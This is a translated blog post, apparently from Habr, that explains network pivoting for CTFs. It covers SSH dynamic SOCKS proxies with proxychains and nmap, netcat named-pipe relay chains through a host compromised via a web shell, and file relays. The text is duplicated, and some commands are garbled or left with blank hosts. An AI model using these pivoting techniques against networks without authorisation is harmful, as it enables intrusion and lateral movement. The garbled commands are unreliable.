Pivoting or port forwarding
I stumbled upon the article " SSH-tunnels - forwarding the port " and wanted to add it.
So, what other ways of tunneling are there:
Suppose we have SSH access to the network, and want to access other hosts / ports on this network. The method already described in the above article assumes knowledge of the host: the port where we want to access. But what if we don't know that?
')
Dynamic access via SSH can be useful here. To configure it, use the ssh -D option.
After connecting, you will receive a dynamic socks4 proxy server, listening on your machine on port 2222 and providing access to the remote network.
How to use this access? One option is to use proxychains.
The second option is to register the address of this proxy server 127.0.0.1:2222 directly in your browser. As a result, we will be able to go to any web server on the remote subnet.
It is very important to understand that ProxyChains knowingly have Chains (translated as “chains” or “chains”) in their name. This means that you can build chains of proxies and thus build tunnels through many subnets. How to do it - I propose to study independently.
Practice shows that many simply do not know about this functionality NetCat. So, imagine a hypothetical situation:
This task is easily solved with the help of netcat tunnels. To do this, run the following commands on your machine:
You must have write access to the current directory to create a backpipe file, and make sure that other services are not listening on ports 1234 and 8443.
On the intermediate machine we do:
You must have write access to the current directory to create the backpipe file. Then we make ssh -p 1234 user@127.0.0.1 on our machine and get direct ssh access to the remote computer.
As a slightly alternative command, you can use:
Here it is important to understand that the netcat client and netcat server can be combined in any combination, and the chain can be built in any length. For example, the option when we have direct access to the "intermediate computer".
Do not forget to create a backpipe on each machine!
By car:
On intermediate computer 1:
...
On the intermediate computer n:
On the intermediate computer n + 1:
You can also use any convenient ports and pipe names.
Similarly, you can transfer files from machine to machine.
For example. By car:
On the machine where the file is:
On an intermediate machine:
In this case, it is not necessary to create a backpipe, since we do not support the session, but simply transfer 1 file in one session.
Perhaps that's all. It helps me a lot in passing various CTFs, I hope you will come in handy.
So, what other ways of tunneling are there:
1. Dynamic SSH Access
Suppose we have SSH access to the network, and want to access other hosts / ports on this network. The method already described in the above article assumes knowledge of the host: the port where we want to access. But what if we don't know that?
')
Dynamic access via SSH can be useful here. To configure it, use the ssh -D option.
ssh -D 127:0.0.1:2222 user@remotehost After connecting, you will receive a dynamic socks4 proxy server, listening on your machine on port 2222 and providing access to the remote network.
How to use this access? One option is to use proxychains.
- Install Proxychains:
apt-get proxychains - Configure proxychains to use port 2222 (our proxy listens on it). To do this, edit the /etc/proxychains.conf file and change the current configuration in the [ProxyList] section from socks4 127.0.0.1 9050 to socks4 127.0.0.1 2222
- Now we can use proxychains with (almost) any utility. For example, you can run a scan of the entire remote network using nmap:
proxychains nmap -sT -sV -v -P0 _ _
The second option is to register the address of this proxy server 127.0.0.1:2222 directly in your browser. As a result, we will be able to go to any web server on the remote subnet.
It is very important to understand that ProxyChains knowingly have Chains (translated as “chains” or “chains”) in their name. This means that you can build chains of proxies and thus build tunnels through many subnets. How to do it - I propose to study independently.
2. NetCat Tunnels (nc)
Practice shows that many simply do not know about this functionality NetCat. So, imagine a hypothetical situation:
- We have access to a remote computer on one computer (for example, using a web shell). We will call this computer "intermediate computer";
- There is access to netcat on this computer;
- We can connect from this computer using Netcat to our computer (but not vice versa - that is, we have the so-called reverse shell);
- There is a strong desire to connect to some server on a remote network, for example, via ssh protocol on port 22, but there is no ssh client on the intermediate computer and you cannot install it.
This task is easily solved with the help of netcat tunnels. To do this, run the following commands on your machine:
mknod backpipe -p nc -lvp 1234 0<backpipe | nc -lvp 8443 1>backpipe You must have write access to the current directory to create a backpipe file, and make sure that other services are not listening on ports 1234 and 8443.
On the intermediate machine we do:
mknod backpipe -p nc __ 8443 0<backpipe | nc __ 22 1>backpipe You must have write access to the current directory to create the backpipe file. Then we make ssh -p 1234 user@127.0.0.1 on our machine and get direct ssh access to the remote computer.
As a slightly alternative command, you can use:
mkfifo backpipe ( mknod -p) nc -lvp 1234 0<backpipe | nc -lvp 8443 | tee backpipe Here it is important to understand that the netcat client and netcat server can be combined in any combination, and the chain can be built in any length. For example, the option when we have direct access to the "intermediate computer".
Do not forget to create a backpipe on each machine!
By car:
nc -lp 1234 0<backpipe | nc __ 443 1>backpipe On intermediate computer 1:
nc -lp 443 0<backpipe | nc ___ 443 1>backpipe ...
On the intermediate computer n:
nc -lp 443 0<backpipe | nc _n+1__ 443 1>backpipe On the intermediate computer n + 1:
nc -lp 443 0<backpipe | nc _ _ 1>backpipe You can also use any convenient ports and pipe names.
Similarly, you can transfer files from machine to machine.
For example. By car:
nc -lp 443 >file.txt On the machine where the file is:
nc -lp 443 <file.txt On an intermediate machine:
nc __ 443 | nc ___ 443 In this case, it is not necessary to create a backpipe, since we do not support the session, but simply transfer 1 file in one session.
Perhaps that's all. It helps me a lot in passing various CTFs, I hope you will come in handy.
Source: https://habr.com/ru/post/302168/
All Articles